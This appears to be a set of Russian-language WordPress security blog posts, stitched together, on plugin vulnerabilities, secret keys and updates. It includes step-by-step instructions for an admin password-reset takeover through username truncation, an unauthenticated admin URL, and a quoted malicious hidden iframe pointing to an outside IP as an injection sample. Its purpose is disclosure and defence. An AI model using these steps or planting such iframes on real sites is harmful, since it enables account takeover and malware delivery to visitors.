На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога.

Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп.

Плагин e-Commerce используется для создания интернет-магазина на основе вашего Wordpress-блога.

Уязвимость в плагине Wordpress Media Holder связана с ошибкой обработки данных при работе с базой MySQL вашего блога. Эксплоит можно просмотреть здесь.

Уязвимость в плагине Wordpress e-Commerce связана с неправильной обработкой загружаемых на сервер файлов. Эксплоит можно посмотреть здесь.

Если вы используете один из этих плагинов в своем блоге, отключите их до тех пор, пока появится обновление, которое исправляет данные уязвимости.

Для борьбы с уязвимостями которые используют базу данных MySQL в Wordpress-блоге, возможно будет полезно изменение префикса таблиц, при установке блога, либо если блог уже установлен со стандартным префиксом wp_ воспользуйтесь плагином, который изменяет префиксы таблиц, в уже существующем блоге.

Связанные записи

• Уязвимости в Contact Form ][ для Wordpress (0)
• Уязвимость усечения данных в SQL Wordpress 2.6.1 (3)
• Уязвимость секретного ключа в wordpress 2.5 (6)
• Уязвимость плагина WP-Photo-Album (0)
• Уязвимость в плагине Wordpress Spreadsheet 0.6 (0)

На эту уязвимость уже написан эксплоит, который позволяет извлечь из блога-жертвы очень много, важных данных, таких как:

• Настройки блога и активные плагины
• Список пользователей блога
• Список администраторов блога

Сам эскплоит можно скачать здесь.

Для закрытия уязвимости, либо отключите плагин, либо смените префикс таблиц, в базе данных вашего блога со стандартного wp_ на что-то типа dsf342h_

Связанные записи

• Уязвимость плагина WP-Photo-Album (0)
• Уязвимость в плагине Wordpress Spreadsheet 0.6 (0)
• Уязвимости в плагинах wp-people, Simple Forum, WP Photo Album, Search Unleashed, Sniplets (0)
• Уязвимости в плагинах wp-calc и wp-adserv (0)
• Уязвимости в плагинах Media Holder и e-Commerce (0)

1. Идем по ссылке server.com/wp-login.php?action=register
2. Регистрируемся как пользователь "admin                         x" и Ваш email
3. Логин выглядит как admin[55 пробелов]х
4. После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword
5. В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора.
6. Получаем письмо с ссылкой на сброс пароля, сбрасываем пароль администратора. Новый пароль прийдет на email, но правда уже не на Ваш, а на email настоящего администратора блога.

Связанные записи

• Уязвимость секретного ключа в wordpress 2.5 (6)
• Уязвимости в Contact Form ][ для Wordpress (0)
• Уязвимость Wordpress Plugin Download Manager 0.2 (0)
• Уязвимости в плагинах Media Holder и e-Commerce (0)
• Срочное обновление безопасности WordPress 2.3.3 (0)

Плохая защита от ботов: отсутствие капчи, позволяет спам-ботам отправлять неограниченное количество спам-сообщений администратору сайта.

Использование функционала для рассылки спама: в форме контактов есть поле которое называется "Отправить копию самому себе", это настраивается в настройках плагина (CarbonCopy Ability), используя это поле, спам можно отправлять не только администратору сайта но и другим людям.

Используя эти две уязвимости, можно превратить контактную форму в инструмент по рассылке спама, большому количеству людей.

Источник: WebSecurity.

В своих блогах и своим заказчикам я устанавливаю контактную форму Wordpress с помощью плагина Wordpress Contact Form III, там присутствует проверка от спам-ботов.

Связанные записи

• Уязвимость усечения данных в SQL Wordpress 2.6.1 (3)
• Уязвимости в плагинах Media Holder и e-Commerce (0)
• Обновлен плагин wp-no-version (0)
• Уязвимость секретного ключа в wordpress 2.5 (6)
• Уязвимость плагина WP-Photo-Album (0)

Строчки эти выглядят вот так:

define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.
define('SECURE_AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.
define('LOGGED_IN_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.

Значение каждого параметра должно быть уникальным, сложным и длинным. Что бы не утруждать себя выдумыванием этих значений, вы можете воспользоваться специальным сервисом Wordpress, который генерирует эти три строчки для вашего файла конфигурации.

Просто откройте эту страничку, и скопируйте код в файл конфигурации вашего Wordpress блога wp-config.php, вот и все, теперь проблема с уникальными ключами вашего блога решена и ваш блог стал еще более защищённым.

Блоговодство:

• Сервисы для привлечения траффика на блог
• Про идеальный сайт
• Выявление дублированного контента на сайте

Связанные записи

• Уязвимость усечения данных в SQL Wordpress 2.6.1 (3)
• Уязвимости в Contact Form ][ для Wordpress (0)
• Срочное обновление безопасности WordPress 2.3.3 (0)
• Обновлен плагин wp-no-version (0)
• Гостевой пост в блоге Антона Попова. (0)

<!-- Traffic Statistics --> <iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

Если у вас нашлось что-то подобное, ознакомьтесь с этим постом.

Связанные записи

• Уязвимость усечения данных в SQL Wordpress 2.6.1 (3)
• Уязвимости в Contact Form ][ для Wordpress (0)
• Срочное обновление безопасности WordPress 2.3.3 (0)
• Секретные ключи в Wordpress 2.6 (0)
• Обновлен плагин wp-no-version (0)

Исправления данной ошибки пока не существует, возможно будет выпущен патч, или ошибка будет исправлена в следующей версии Wordpress.

Пример использования данной уязвимости.

Связанные записи

• Уязвимость усечения данных в SQL Wordpress 2.6.1 (3)
• Уязвимости в Contact Form ][ для Wordpress (0)
• Уязвимость секретного ключа в wordpress 2.5 (6)
• Уязвимость плагина WP-Photo-Album (0)
• Уязвимость в плагине Wordpress Spreadsheet 0.6 (0)

• Теперь после установки Wordpress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках. Теоритически возможность атаки блога через этот протокол существует, а блоггеров которые активно пользуются этим протоколом не так уж и много, поэтому данная мера должна немного повысить безопасность вашего блога.
• Полная поддержка работы по протоколу шифрования SSL. Никаких плагинов и настроек делать не нужно, если возможно то Wordpress сам будет пытаться работать через зашифрованное подключение SSL.
• Улучшения работы с базой данных и хранением сессий пользователей.

Помимо всего этого, обновление до версии Wordpress 2.6 исправляет 194 ошибки, которые небыли исправлены в 2.5.1.

Лично я уже обновил все свои блоги до версии 2.6, хотя на многих сайтах рекомендуют подождать немного, что бы посмотреть как будет работать новая версия. С уверенностью заявляю, пока что новая версия Wordpress 2.6 на моих ресурсах работает отлично.

Скачать русскую версию Wordpress 2.6 вы можете на официальном сайте Wordpress.

Связанные записи

• Срочное обновление безопасности WordPress 2.3.3 (0)
• Обновлен плагин wp-no-version (0)
• Уязвимость усечения данных в SQL Wordpress 2.6.1 (3)
• Уязвимости в Contact Form ][ для Wordpress (0)
• Секретные ключи в Wordpress 2.6 (0)

Злоумышленник, может без авторизации использовать следующий скрипт:

http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery

Насколько известно, исправлений в данный момент не существует.

Связанные записи

• Уязвимость плагина WP-Photo-Album (0)
• Уязвимость в плагине Wordpress Spreadsheet 0.6 (0)
• Уязвимость SQL-инъекции в плагине WP Comment Remix (1)
• Уязвимости в плагинах wp-people, Simple Forum, WP Photo Album, Search Unleashed, Sniplets (0)
• Уязвимости в плагинах wp-calc и wp-adserv (0)

В новых версиях Wordpress этот ключ стали использовать для усиления алгоритма криптования паролей md5, поэтому очень важно иметь в качестве этого параметра какую-то длинную строчку с различными символами, дабы усложнить процесс расшифровки вашего пароля, если не дай то бог, злоумышленник получил доступ к зашифрованным паролям.

При установке или обновлении блога, Wordpress изначально не предлагает изменить эту строчку и вообще о ней ничего не говорит, именно поэтому у большинства блоггеров этот параметр выглядит примерно вот так: "put your unique phrase here".

Если вам лениво придумывать длинный набор символов, для этого параметра, воспользуйтесь онлайн сервисом, который сгенерирует для вас подходящую строчку. После этого, откройте файл wp-config.php и измените стандартную строку "put your unique phrase here" на строчку которую вы сгенерировали на сайте. Сохраните изменения и закачайте файл на сервер.

Связанные записи

• Уязвимость усечения данных в SQL Wordpress 2.6.1 (3)
• Уязвимости в плагинах Media Holder и e-Commerce (0)
• Уязвимости в Contact Form ][ для Wordpress (0)
• Не сохраняйте пароли в ФТП программах. (5)
• Уязвимость плагина WP-Photo-Album (0)